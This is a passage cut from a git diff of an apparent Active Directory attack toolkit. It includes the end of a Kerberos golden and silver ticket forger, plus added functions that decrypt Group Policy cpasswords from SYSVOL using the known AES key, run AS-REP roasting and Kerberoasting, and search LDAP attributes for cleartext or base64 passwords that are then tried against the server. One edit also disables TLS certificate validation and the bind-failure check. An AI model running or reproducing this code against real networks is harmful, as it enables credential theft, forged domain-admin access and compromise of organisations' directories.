KERB_NON_KERB_CKSUM_SALT, blobToChecksum) + logging.info('\tPAC_SERVER_CHECKSUM') + privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature']) + logging.info('\tPAC_PRIVSVR_CHECKSUM') + + buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment + pacType['Buffers'] = buffers + buffersTail + + authorizationData = AuthorizationData() + authorizationData[0] = noValue + authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value + authorizationData[0]['ad-data'] = pacType.getData() + authorizationData = encoder.encode(authorizationData) + + encTicketPart['authorization-data'][0]['ad-data'] = authorizationData + + if logging.getLogger().level == logging.DEBUG: + logging.debug('Customized EncTicketPart') + print(encTicketPart.prettyPrint()) + print ('\n') + + encodedEncTicketPart = encoder.encode(encTicketPart) + + cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']] + if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value: + key = Key(cipher.enctype, unhexlify(self.__options.aesKey)) + elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value: + key = Key(cipher.enctype, unhexlify(self.__options.aesKey)) + elif cipher.enctype == EncryptionTypes.rc4_hmac.value: + key = Key(cipher.enctype, unhexlify(self.__options.nthash)) + else: + raise Exception('Unsupported enctype 0x%x' % cipher.enctype) + + # Key Usage 2 + # AS-REP Ticket and TGS-REP Ticket (includes TGS session + # key or application session key), encrypted with the + # service key (Section 5.3) + logging.info('\tEncTicketPart') + cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None) + + kdcRep['ticket']['enc-part']['cipher'] = cipherText + kdcRep['ticket']['enc-part']['kvno'] = 2 + + # Lastly.. we have to encrypt the kdcRep['enc-part'] part + # with a key we chose. 
It actually doesn't really matter since nobody uses it (could it be trash?) + encodedEncASRepPart = encoder.encode(encASorTGSRepPart) + + if self.__domain == self.__server: + # Key Usage 3 + # AS-REP encrypted part (includes TGS session key or + # application session key), encrypted with the client key + # (Section 5.4.2) + sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets()) + logging.info('\tEncASRepPart') + cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None) + else: + # Key Usage 8 + # TGS-REP encrypted part (includes application session + # key), encrypted with the TGS session key + # (Section 5.4.2) + sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets()) + logging.info('\tEncTGSRepPart') + cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None) + + kdcRep['enc-part']['cipher'] = cipherText + kdcRep['enc-part']['etype'] = cipher.enctype + kdcRep['enc-part']['kvno'] = 1 + + if logging.getLogger().level == logging.DEBUG: + logging.debug('Final Golden Ticket') + print(kdcRep.prettyPrint()) + print ('\n') + + return encoder.encode(kdcRep), cipher, sessionKey + + def saveTicket(self, ticket, sessionKey): + logging.info('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache')) + from impacket.krb5.ccache import CCache + ccache = CCache() + + if self.__server == self.__domain: + ccache.fromTGT(ticket, sessionKey, sessionKey) + else: + ccache.fromTGS(ticket, sessionKey, sessionKey) + ccache.saveFile(self.__target.replace('/','.') + '.ccache') + + def run(self): + ticket, adIfRelevant = self.createBasicTicket() + if ticket is not None: + encASorTGSRepPart, encTicketPart, pacInfos = self.customizeTicket(ticket, adIfRelevant) + ticket, cipher, sessionKey = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos) + self.saveTicket(ticket, sessionKey) + return True + return False + +if __name__ == '__main__': + print(version.BANNER) + + parser = 
argparse.ArgumentParser(add_help=True, description="Creates a Kerberos golden/silver tickets based on " + "user options") + parser.add_argument('target', action='store', help='username for the newly created ticket') + parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the silver ticket will' + ' be generated for. if omitted, golden ticket will be created') + parser.add_argument('-request', action='store_true', default=False, help='Requests ticket to domain and clones it ' + 'changing only the supplied information. It requires specifying -user') + parser.add_argument('-domain', action='store', required=True, help='the fully qualified domain name (e.g. contoso.com)') + parser.add_argument('-domain-sid', action='store', required=True, help='Domain SID of the target domain the ticker will be ' + 'generated for') + parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key used for signing the ticket ' + '(128 or 256 bits)') + parser.add_argument('-nthash', action="store", help='NT hash used for signing the ticket') + parser.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file (silver ticket only)') + parser.add_argument('-groups', action="store", default = '513, 512, 520, 518, 519', help='comma separated list of ' + 'groups user will belong to (default = 513, 512, 520, 518, 519)') + parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be ' + 'created for (default = 500)') + parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC') + parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires ' + '(default = 365*10)') + parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') + parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') + + 
group = parser.add_argument_group('authentication') + + group.add_argument('-user', action="store", help='domain/username to be used if -request is chosen (it can be ' + 'different from domain/username)') + group.add_argument('-password', action="store", help='password for domain/username') + group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') + group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' + 'omitted it will use the domain part (FQDN) specified in the target parameter') + + if len(sys.argv)==1: + parser.print_help() + print("\nExamples: ") + print("\t./ticketer.py -nthash -domain-sid -domain baduser\n") + print("\twill create and save a golden ticket for user 'baduser' that will be all encrypted/signed using RC4.") + print("\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256") + print("\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as") + print("\tbaduser.ccache.\n") + print("\t./ticketer.py -nthash -aesKey -domain-sid -domain " + " -request -user -password baduser\n") + print("\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used") + print("\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,") + print("\thence you might need to specify both -nthash and -aesKey data. 
Ticket will be generated for 'baduser'") + print("\tand saved as baduser.ccache") + sys.exit(1) + + options = parser.parse_args() + + # Init the example's logger theme + logger.init(options.ts) + + if options.debug is True: + logging.getLogger().setLevel(logging.DEBUG) + # Print the Library's installation path + logging.debug(version.getInstallationPath()) + else: + logging.getLogger().setLevel(logging.INFO) + + if options.domain is None: + logging.critical('Domain should be specified!') + sys.exit(1) + + if options.aesKey is None and options.nthash is None and options.keytab is None: + logging.error('You have to specify either aesKey, or nthash, or keytab') + sys.exit(1) + + if options.aesKey is not None and options.nthash is not None and options.request is False: + logging.error('You cannot specify both -aesKey and -nthash w/o using -request. Pick only one') + sys.exit(1) + + if options.request is True and options.user is None: + logging.error('-request parameter needs -user to be specified') + sys.exit(1) + + if options.request is True and options.hashes is None and options.password is None: + from getpass import getpass + password = getpass("Password:") + else: + password = options.password + + try: + executer = TICKETER(options.target, password, options.domain, options) + executer.run() + except Exception as e: + if logging.getLogger().level == logging.DEBUG: + import traceback + traceback.print_exc() + print(str(e)) diff --git a/ade/connectors/connectors.py b/ade/connectors/connectors.py index 0099a3c..4b3c998 100644 --- a/ade/connectors/connectors.py +++ b/ade/connectors/connectors.py @@ -1,4 +1,5 @@ # LDAP connection +import ssl import ldap3 from ldap3.core.exceptions import LDAPBindError # SMB connection @@ -28,13 +29,15 @@ def ldap_connector(self, server: str, ldaps: bool, domuser: str, passwd: str, le ''' if ldaps: - dc_conn = ldap3.Server(server, port=636, use_ssl=True, get_info=level) + dc_conn = ldap3.Server(server, port=636, use_ssl=True, 
get_info=level, tls=ldap3.Tls(validate=ssl.CERT_NONE)) conn = ldap3.Connection(dc_conn, user=domuser, password=passwd) conn.bind() + print(conn) conn.start_tls() # Validate the login (bind) request - if int(conn.result['result']) != 0: - raise LDAPBindError + #if int(conn.result['result']) != 0: + + #raise LDAPBindError else: dc_conn = ldap3.Server(server, get_info=level) conn = ldap3.Connection(dc_conn, user=domuser, password=passwd) diff --git a/ade/modEnumerator/modEnumerator.py b/ade/modEnumerator/modEnumerator.py index e115281..f31c625 100644 --- a/ade/modEnumerator/modEnumerator.py +++ b/ade/modEnumerator/modEnumerator.py @@ -2,14 +2,25 @@ import json import ldap3 -from ldap3.core.exceptions import LDAPBindError +import re +import base64 +import os +import socket +import concurrent.futures +from ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError +from impacket.dcerpc.v5 import epm +from impacket.smbconnection import SessionError +from impacket.nmb import NetBIOSTimeout, NetBIOSError +from termcolor import colored +from Cryptodome.Cipher import AES from . .connectors.connectors import Connectors +from . 
.utils.utils import Utils class ModEnumerator(): def __init__(self): - pass + self.utils = Utils() def enumerate_server_names(self, computerobjects: ldap3.Entry) -> dict: @@ -96,4 +107,285 @@ def enumerate_for_cleartext_passwords(self, peopleobjects: ldap3.Entry, server: # We had a valid login passwords[user['attributes']['name'][0]] = user['attributes'].get('userPassword') - return passwords \ No newline at end of file + return passwords + + + def enumNULLSessions(self, server: str, connector: Connectors): + # Test for anonymous binds to ldap + try: + ldap = connector.ldap_connector(server, False, '', '') + print('[ ' + colored('WARN', 'yellow') +' ] Anonymous LDAP bind allowed') + except LDAPBindError: + print('[ ' + colored('INFO', 'green') +' ] Anonymous LDAP bind not allowed') + ldap.unbind() + + # Test for null-session/anonymous session on smb + smb = connector.smb_connector(server, '', '') + if smb: + # It is not False and as such, we got a connection back + print('[ ' + colored('WARN', 'yellow') + f' ] Anonymous/NULL SMB connection allowed got ServerOS: {smb.getServerOS()} and HostName: {str(smb.getServerName())}') + else: + print('[ ' + colored('INFO', 'green') +' ] Anonymous/NULL SMB connection not allowed') + smb.logoff() + + # Test for null-session/anonymous session on rpc + rpc = connector.rpc_connector(server, '', '') + resp = rpc.bind(epm.MSRPC_UUID_PORTMAP) + # TODO: Validate by negative test + if resp.getData(): + print('[ ' + colored('WARN', 'yellow') + f' ] Anonymous/NULL RPC connection allowed got following bytes: {resp.getData()} from the connection') + else: + print('[ ' + colored('INFO', 'green') +' ] Anonymous/NULL RPC connection not allowed') + + + def enumSYSVOL(self, server: str, connector: Connectors, domuser: str, passwd: str) -> dict: + print('[ .. 
] Searching SYSVOL for cpasswords\r') + cpasswords = {} + try: + smbconn = connector.smb_connector(server, domuser, passwd) + dirs = smbconn.listShares() + for share in dirs: + if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol': + path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') + paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2] + for dirname in paths: + try: + # Dont want . or .. + subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*') + for sub in subPath: + if len(sub.get_shortname()) > 2: + paths.append(dirname + '\\' + sub.get_shortname()) + except (SessionError, UnicodeEncodeError, NetBIOSError) as e: + continue + + # Compile regexes for username and passwords + cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"') + unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"') + + # Prepare the ciphers based on MSDN article with key and IV + cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16)) + + # Since the first entry is the DC we dont want that + for item in paths[1:]: + if '.xml' in item.split('\\')[-1]: + with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f: + smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write) + with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f: + try: + fileContent = f.read() + passwdMatch = cpassRE.findall(str(fileContent)) + for passwd in passwdMatch: + unameMatch = unameRE.findall(str(fileContent)) + for usr in unameMatch: + padding = '=' * (4 - len(passwd) % 4) + # For some reason, trailing nul bytes were on each character, so we remove any if they are there + cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '') + except (UnicodeDecodeError, AttributeError) as e: + # Remove the files we had to 
write during the search + os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) + continue + + # Remove the files we had to write during the search + os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) + + except (SessionError, UnicodeEncodeError, NetBIOSError): + print('[ ' + colored('ERROR', 'red') + ' ] Some error occurred while searching SYSVOL') + else: + smbconn.close() + return cpasswords + + + def enumSMB(self, connector: Connectors, smbShareCandidates: list, server: str, domuser: str, passwd: str) -> dict: + self.connector = connector + self.server = server + self.domuser = domuser + self.passwd = passwd + smbBrowseable = {} + try: + with concurrent.futures.ThreadPoolExecutor(max_workers=len(smbShareCandidates)) as executor: + worker = executor.map(self.enumShare, [share for share in smbShareCandidates]) + for result in worker: + smbBrowseable = { **smbBrowseable, **result } + except ValueError: + pass + return smbBrowseable + + + def enumShare(self, dnsname): + smbBrowseable = {} + try: + # Changing default timeout as shares should respond within 5 seconds if there is a share + # and ACLs make it available to self.user with self.passwd + smbconn = self.connector.smb_connector(self.server, self.domuser, self.passwd) + dirs = smbconn.listShares() + smbBrowseable[str(dnsname)] = {} + for share in dirs: + smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = '' + try: + _ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') + smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True + except (SessionError, UnicodeEncodeError, NetBIOSError): + # Didn't have permission, all good + # I'm second guessing the below adding to the JSON file as we're only interested in the listable directories really + #self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False + continue + smbconn.logoff() + except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError): + # 
TODO: Examine why we sometimes get: + # impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE + # on healthy shares. It seems to be reported with CIF shares + return smbBrowseable + return smbBrowseable + + + def enumASREPRoast(self, conn: ldap3.Connection, server: str, dc_string) -> list: + from . .attacks.asreproast import asreproast + roaster = asreproast.AsRepRoast() + # Build user array + users = [] + conn.search(dc_string, '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes='*', search_scope=ldap3.SUBTREE) + for entry in conn.entries: + users.append(str(entry['sAMAccountName']) + '@{0}'.format(server)) + if len(users) == 0: + print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that do not require Kerberos preauthentication'.format(len(users))) + elif len(users) == 1: + print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users))) + else: + print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that do not require Kerberos preauthentication'.format(len(users))) + + hashes = [] + # Build request for Tickets + for usr in users: + userHash = roaster.RepRoast(server, usr) + if userHash: + hashes = hashes + userHash + + return hashes + + + def enumKerberoast(self, spn: list, domuser: str, passwd: str) -> dict: + from . 
.attacks.kerberoast import kerberoast + kerberoaster = kerberoast.Kerberoast() + + users_spn = {} + user_tickets = {} + + userDomain = domuser.split('@')[1] + + idx = 0 + for _ in spn: + spns = json.loads(spn[idx].entry_to_json()) + users_spn[self.utils.splitJsonArr(spns['attributes'].get('name'))] = self.utils.splitJsonArr(spns['attributes'].get('servicePrincipalName')) + idx += 1 + for user, spn in users_spn.items(): + if isinstance(spn, list): + # We only really need one to get a ticket + spn = spn[0] + else: + tickets = kerberoaster.roast(domuser, passwd, userDomain, user, spn) + if tickets: + user_tickets = { **user_tickets, **tickets } + + return user_tickets + + + def enumForCreds(self, CREDS: bool, passwords: dict, ldapdump: list, connector: Connectors, server: str) -> bool: + searchTerms = [ + 'legacy', 'pass', 'password', 'pwd', 'passcode' + ] + excludeTerms = [ + 'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN' + ] + possiblePass = {} + idx = 0 + for _ in ldapdump: + user = json.loads(ldapdump[idx].entry_to_json()) + for prop, value in user['attributes'].items(): + if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms): + try: + possiblePass[user['attributes']['userPrincipalName'][0]] = value[0] + except KeyError: + # Could be a service user instead + try: + possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0] + except KeyError: + # Don't know which type + continue + + idx += 1 + if len(possiblePass) > 0: + print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties - attempting to determine if it is a password') + + for user, password in possiblePass.items(): + try: + usr, passwd = self.entroPass(user, password, server, CREDS, connector) + except TypeError: + # None returned, just continue + continue + if not CREDS: + domuser = usr + passwd = passwd + passwords[domuser] = passwd + return True, passwords + return False, passwords + + + def 
entroPass(self, user: str, password: str, server: str, CREDS: bool, connector: Connectors): + test_conn = None + if not password: + return None + # First check if it is a clear text + try: + test_conn = connector.ldap_connector(server, True, user, password) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + try: + test_conn = connector.ldap_connector(server, False, user, password) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + pass + if test_conn: + # Validate the login (bind) request + if int(test_conn.result['result']) != 0: + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password)) + else: + print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password)) + else: + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password)) + else: + print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password)) + print('') + return user, password + test_conn.unbind() + test_conn = None + + # Attempt for base64 + # Could be base64, lets try + try: + pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8') + except base64.binascii.Error: + return None + + # Attempt decoded PW + try: + test_conn = connector.ldap_connector(server, True, user, pw) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + try: + test_conn = connector.ldap_connector(server, False, user, pw) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + pass + if test_conn: + # Validate the login (bind) request + if int(test_conn.result['result']) != 0: + test_conn.unbind() + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw)) + else: + print('[ ' + 
colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw)) + else: + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw)) + else: + print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw)) + print('') + return user, pw \ No newline at end of file diff --git a/ade/utils/__init__.py b/ade/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/ade/utils/utils.py b/ade/utils/utils.py new file mode 100644 index 0000000..54447da --- /dev/null +++ b/ade/utils/utils.py @@ -0,0 +1,33 @@ +import json +from termcolor import colored + + +class Utils(): + + + def __init__(self): + pass + + + def WriteFiles(self, output: str, content, name: str): + with open(str(output) + f'-{name}', 'w') as f: + if isinstance(content, list): + for item in content: + f.write(str(item)) + f.write('\n') + elif isinstance(content, dict): + if 'json' in name: + json.dump(content, f, indent=4, sort_keys=False) + else: + for key, value in content: + f.write(f'{key}:{value}') + f.write('\n') + + print('[ ' + colored('OK', 'green') + f' ] Wrote {name}') + + + def splitJsonArr(self, arr): + if isinstance(arr, list): + if len(arr) == 1: + return arr[0] + return arr \ No newline at end of file diff --git a/external/LICENSE b/external/LICENSE deleted file mode 100755 index 9fa07de..0000000 --- a/external/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2018 Fox-IT - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished 
to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/external/bloodhound/__init__.py b/external/bloodhound/__init__.py deleted file mode 100755 index 6a45b30..0000000 --- a/external/bloodhound/__init__.py +++ /dev/null @@ -1,291 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. 
-# -#################### - -import os, sys, logging, argparse, getpass, time, re -from .ad.domain import AD, ADDC -from .ad.authentication import ADAuthentication -from .enumeration.computers import ComputerEnumerator -from .enumeration.memberships import MembershipEnumerator -from .enumeration.domains import DomainEnumerator - -""" -BloodHound.py is a Python port of BloodHound, designed to run on Linux and Windows. -""" -class BloodHound(object): - def __init__(self, ad): - self.ad = ad - self.ldap = None - self.pdc = None - self.sessions = [] - - - def connect(self): - if len(self.ad.dcs()) == 0: - logging.error('Could not find a domain controller. Consider specifying a domain and/or DNS server.') - - if not self.ad.baseDN: - logging.error('Could not figure out the domain to query. Please specify this manualy with -d') - - pdc = self.ad.dcs()[0] - logging.debug('Using LDAP server: %s', pdc) - logging.debug('Using base DN: %s', self.ad.baseDN) - - if len(self.ad.kdcs()) > 0: - kdc = self.ad.kdcs()[0] - logging.debug('Using kerberos KDC: %s', kdc) - logging.debug('Using kerberos realm: %s', self.ad.realm()) - - # Create a domain controller object - self.pdc = ADDC(pdc, self.ad) - # Create an object resolver - self.ad.create_objectresolver(self.pdc) -# self.pdc.ldap_connect(self.ad.auth.username, self.ad.auth.password, kdc) - - - def run(self, collect, num_workers=10, disable_pooling=False): - start_time = time.time() - if 'group' in collect or 'objectprops' in collect or 'acl' in collect: - # Fetch domains/computers for later - self.pdc.prefetch_info('objectprops' in collect, 'acl' in collect) - # Initialize enumerator - membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) - membership_enum.enumerate_memberships() - elif any(method in collect for method in ['localadmin', 'session', 'loggedon', 'experimental', 'rdp', 'dcom', 'psremote']): - # We need to know which computers to query regardless - # We also need the domains to have a 
mapping from NETBIOS -> FQDN for local admins - self.pdc.prefetch_info('objectprops' in collect, 'acl' in collect) - elif 'trusts' in collect: - # Prefetch domains - self.pdc.get_domains('acl' in collect) - if 'trusts' in collect or 'acl' in collect or 'objectprops' in collect: - trusts_enum = DomainEnumerator(self.ad, self.pdc) - trusts_enum.dump_domain(collect) - if 'localadmin' in collect or 'session' in collect or 'loggedon' in collect or 'experimental' in collect: - # If we don't have a GC server, don't use it for deconflictation - have_gc = len(self.ad.gcs()) > 0 - computer_enum = ComputerEnumerator(self.ad, self.pdc, collect, do_gc_lookup=have_gc) - computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers) - end_time = time.time() - minutes, seconds = divmod(int(end_time-start_time),60) - logging.info('Done in %02dM %02dS' % (minutes, seconds)) - - -def kerberize(): - # If the kerberos credential cache is known, use that. - krb5cc = os.getenv('KRB5CCNAME') - - # Otherwise, guess it. 
- if krb5cc is None: - krb5cc = '/tmp/krb5cc_%u' % os.getuid() - - if os.path.isfile(krb5cc): - logging.debug('Using kerberos credential cache: %s', krb5cc) - if os.getenv('KRB5CCNAME') is None: - os.environ['KRB5CCNAME'] = krb5cc - else: - logging.error('Could not find kerberos credential cache file') - sys.exit(1) - -def resolve_collection_methods(methods): - """ - Convert methods (string) to list of validated methods to resolve - """ - valid_methods = ['group', 'localadmin', 'session', 'trusts', 'default', 'all', 'loggedon', - 'objectprops', 'experimental', 'acl', 'dcom', 'rdp', 'psremote', 'dconly'] - default_methods = ['group', 'localadmin', 'session', 'trusts'] - # Similar to SharpHound, All is not really all, it excludes loggedon - all_methods = ['group', 'localadmin', 'session', 'trusts', 'objectprops', 'acl', 'dcom', 'rdp', 'psremote'] - # DC only, does not collect to computers - dconly_methods = ['group', 'trusts', 'objectprops', 'acl'] - if ',' in methods: - method_list = [method.lower() for method in methods.split(',')] - validated_methods = [] - for method in method_list: - if method not in valid_methods: - logging.error('Invalid collection method specified: %s', method) - return False - - if method == 'default': - validated_methods += default_methods - elif method == 'all': - validated_methods += all_methods - elif method == 'dconly': - validated_methods += dconly_methods - else: - validated_methods.append(method) - return set(validated_methods) - else: - validated_methods = [] - # It is only one - method = methods.lower() - if method in valid_methods: - if method == 'default': - validated_methods += default_methods - elif method == 'all': - validated_methods += all_methods - elif method == 'dconly': - validated_methods += dconly_methods - else: - validated_methods.append(method) - return set(validated_methods) - else: - logging.error('Invalid collection method specified: %s', method) - return False - -def main(): -# 2020-03-10: Commented out all 
below logging definition that wasnt already - #logging.basicConfig(stream=sys.stderr, level=logging.INFO) - logging.basicConfig(stream=os.devnull, level=logging.INFO) - - logger = logging.getLogger() - logger.setLevel(logging.INFO) - #stream = logging.StreamHandler(sys.stderr) - stream = logging.StreamHandler(os.devnull) - stream.setLevel(logging.DEBUG) - formatter = logging.Formatter('%(levelname)s: %(message)s') - formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s') - stream.setFormatter(formatter) - logger.addHandler(stream) - - parser = argparse.ArgumentParser(add_help=True, description='Python based ingestor for BloodHound\nFor help or reporting issues, visit https://github.com/Fox-IT/BloodHound.py', formatter_class=argparse.RawDescriptionHelpFormatter) - - parser.add_argument('-c', - '--collectionmethod', - action='store', - default='Default', - help='Which information to collect. Supported: Group, LocalAdmin, Session, ' - 'Trusts, Default (all previous), DCOnly (no computer connections), DCOM, RDP,' - 'PSRemote, LoggedOn, ObjectProps, ACL, All (all except LoggedOn). ' - 'You can specify more than one by separating them with a comma. (default: Default)') - parser.add_argument('-u', - '--username', - action='store', - help='Username. 
Format: username[@domain]; If the domain is unspecified, the current domain is used.') - parser.add_argument('-p', - '--password', - action='store', - help='Password') - parser.add_argument('-k', - '--kerberos', - action='store_true', - help='Use kerberos') - parser.add_argument('--hashes', - action='store', - help='LM:NLTM hashes') - parser.add_argument('-ns', - '--nameserver', - action='store', - help='Alternative name server to use for queries') - parser.add_argument('--dns-tcp', - action='store_true', - help='Use TCP instead of UDP for DNS queries') - parser.add_argument('-d', - '--domain', - action='store', - help='Domain to query.') - parser.add_argument('-dc', - '--domain-controller', - metavar='HOST', - action='store', - help='Override which DC to query (hostname)') - parser.add_argument('-gc', - '--global-catalog', - metavar='HOST', - action='store', - help='Override which GC to query (hostname)') - parser.add_argument('-w', - '--workers', - action='store', - type=int, - default=10, - help='Number of workers for computer enumeration (default: 10)') - parser.add_argument('-v', - action='store_true', - help='Enable verbose output') - parser.add_argument('--disable-pooling', - action='store_true', - help='Don\'t use subprocesses for ACL parsing (only for debugging purposes)') - - args = parser.parse_args() - - if args.v is True: - logger.setLevel(logging.DEBUG) - - if args.kerberos is True: - logging.debug('Authentication: kerberos') - kerberize() - auth = ADAuthentication() - elif args.username is not None and args.password is not None: - logging.debug('Authentication: username/password') - auth = ADAuthentication(username=args.username, password=args.password, domain=args.domain) - elif args.username is not None and args.password is None and args.hashes is None: - args.password = getpass.getpass() - auth = ADAuthentication(username=args.username, password=args.password, domain=args.domain) - elif args.username is None and (args.password is not None or 
